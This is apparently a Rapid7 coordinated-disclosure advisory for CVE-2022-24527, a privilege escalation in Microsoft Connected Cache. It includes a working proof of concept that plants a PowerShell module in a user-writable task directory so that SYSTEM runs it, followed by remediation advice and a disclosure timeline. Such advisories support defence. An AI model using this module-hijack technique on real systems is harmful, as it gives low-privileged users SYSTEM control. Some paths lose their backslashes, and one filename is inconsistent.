On April 12, 2022, Microsoft published [CVE-2022-24527](), a local privilege escalation vulnerability in Microsoft [Connected Cache](). The vulnerability allowed a local low-privileged user to execute arbitrary Powershell as `SYSTEM` due to improper file permission assignment ([CWE-732]()).

## Product description

Connected Cache is a feature used by [Microsoft Endpoint Manager]() “[Distribution Points]()” to support “Delivery Optimization.”

## Credit

This issue was discovered and reported by security researcher [Jake Baines]() as part of [Rapid7’s vulnerability disclosure program]().

## Exploitation

When Connected Cache is in use on a Distribution Point, it is installed, in part, into `C:Doinc`. Below, you can see that there are some Powershell scripts within that directory:

C:>dir /s /b C:Doinc
C:DoincProduct
C:DoincProductInstall
C:DoincProductInstallLogs
C:DoincProductInstallTasks
C:DoincProductInstallTasksCacheNodeKeepAlive.ps1
C:DoincProductInstallTasksMaintenance.ps1
C:DoincProductInstallTasksSetDrivesToHealthy.ps1

Low-privileged users only have `read` and `execute` permissions on the Powershell scripts.

C:DoincProductInstallTasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYNETWORK SERVICE:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)

Maintenance.ps1 NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYNETWORK SERVICE:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)

SetDrivesToHealthy.ps1 NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYNETWORK SERVICE:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)

Successfully processed 3 files; Failed processing 0 files

The Powershell scripts are executed every 60 seconds by the Task Scheduler as `NT AUTHORITYSYSTEM`. All that is fine. The following part is where trouble begins. This is how `SetDrivesToHealthy.ps1` starts:

try
{
import-module ‘webAdministration’

$error.clear()

When `SetDrivesToHealthy.ps1` executes, it attempts to load the `webAdministration` module. Before searching the normal %PSModulePath% path, `SetDrivesToHealthy.ps1` looks for the import in `C:DoincProductInstallTasksWindowsPowerShellModuleswebAdministration`. As we saw above, this directory doesn’t exist. And while low-privileged users can’t modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to `C:DoincProductInstallTasks`:

C:DoincProductInstall>icacls ./Tasks/
./Tasks/ NT AUTHORITYSYSTEM:(I)(OI)(CI)(F)
NT AUTHORITYNETWORK SERVICE:(I)(OI)(CI)(F)
BUILTINAdministrators:(I)(OI)(CI)(F)
BUILTINUsers:(I)(OI)(CI)(RX)
BUILTINUsers:(I)(CI)(AD)
BUILTINUsers:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

An attacker can create the necessary directory structure and place their own `webAdministration` so that `SetDrivesToHealthy.ps1` will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file `C:r7`.

C:DoincProductInstallTasks>dir C:
Volume in drive C has no label.
Volume Serial Number is 3073-81A6

Directory of C:

01/04/2022 05:01 PM Doinc
01/04/2022 05:15 PM DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM inetpub
07/07/2021 04:05 AM PerfLogs
01/05/2022 09:29 AM Program Files
01/05/2022 09:29 AM Program Files (x86)
01/05/2022 09:16 AM SCCMContentLib
01/05/2022 09:15 AM SMSPKGC$
01/05/2022 09:17 AM SMSSIG$
01/05/2022 09:17 AM SMS_DP$
01/04/2022 05:04 PM Users
01/04/2022 03:48 PM Windows
0 File(s) 0 bytes
12 Dir(s) 239,837,327,360 bytes free

C:DoincProductInstallTasks>mkdir WindowsPowerShell

C:DoincProductInstallTasks>mkdir WindowsPowerShellModules

C:DoincProductInstallTasks>mkdir WindowsPowerShellModuleswebAdministration

C:DoincProductInstallTasks>echo New-Item C:r7.txt > WindowsPowerShellModuleswebAdministrationwebAdministration.psm1

C:DoincProductInstallTasks>dir C:
Volume in drive C has no label.
Volume Serial Number is 3073-81A6

Directory of C:

01/04/2022 05:01 PM Doinc
01/04/2022 05:15 PM DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM inetpub
01/05/2022 01:49 PM 0 r7.txt
07/07/2021 04:05 AM PerfLogs
01/05/2022 09:29 AM Program Files
01/05/2022 09:29 AM Program Files (x86)
01/05/2022 09:16 AM SCCMContentLib
01/05/2022 09:15 AM SMSPKGC$
01/05/2022 09:17 AM SMSSIG$
01/05/2022 09:17 AM SMS_DP$
01/04/2022 05:04 PM Users
01/04/2022 03:48 PM Windows
1 File(s) 0 bytes
12 Dir(s) 239,836,917,760 bytes free

C:DoincProductInstallTasks>icacls C:r7.txt
C:lol.txt NT AUTHORITYSYSTEM:(I)(F)
BUILTINAdministrators:(I)(F)
BUILTINUsers:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:DoincProductInstallTasks>

As you can see, the `C:r7.txt` file is created, demonstrating the privilege escalation.

## Remediation

Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.

## Disclosure timeline

**January 5, 2022:** Issue disclosed to the vendor
**January 5, 2022:** Vendor acknowledgement
**January 6, 2022:** Vendor assigns a case identifier
**January 10-11, 2022:** Vendor and researcher discuss clarifying details
**January 19, 2022:** Vendor confirms the vulnerability
**February-March 2022:** Vendor and researcher coordinate on disclosure date and CVE assignment
**April 12, 2022:** Public disclosure (this document)

_**Additional reading:**_

* _[CVE-2022-1026: Kyocera Net View Address Book Exposure]()_
* _[Analyzing the Attack Landscape: Rapid7’s 2021 Vulnerability Intelligence Report]()_
* _[Cloud Pentesting, Pt. 1: Breaking Down the Basics]()_
* _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)]()_

#### NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

SubscribeRead More